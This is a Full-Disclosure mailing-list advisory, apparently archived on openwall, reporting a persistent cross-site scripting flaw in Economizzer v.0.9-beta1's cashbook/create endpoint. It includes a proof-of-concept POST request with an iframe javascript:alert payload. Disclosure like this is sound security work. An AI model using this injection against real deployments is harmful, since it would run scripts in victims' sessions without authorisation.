lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAFmK-Gy1GKF85Z3tib-1MVjUeNmnM12442X0p=wRi-6yPQFx1g@mail.gmail.com> Date: Tue, 6 May 2025 20:43:21 -0400 From: Ron E <ronaldjedgerson@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Persistent Cross-Site Scripting in Economizzer Cashbook Entry A persistent cross-site scripting (XSS) vulnerability exists in gugoan's Economizzer v.0.9-beta1 The application fails to properly sanitize user-supplied input when creating a new cash book entry via the *cashbook/create* endpoint. An attacker can inject malicious JavaScript payloads that are permanently stored and later executed in the context of any user who views the affected entry. https://<host>/web/cashbook/create POST /web/cashbook/create HTTP/2 Host: <host> - ------WebKitFormBoundaryM93AAtGLA59fTnSU --snip-- <iframe src="javascript:alert(4)"> ------WebKitFormBoundaryM93AAtGLA59fTnSU Content-Disposition: form-data; name="Cashbook[is_pending]" --snip-- _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Powered by blists - more mailing lists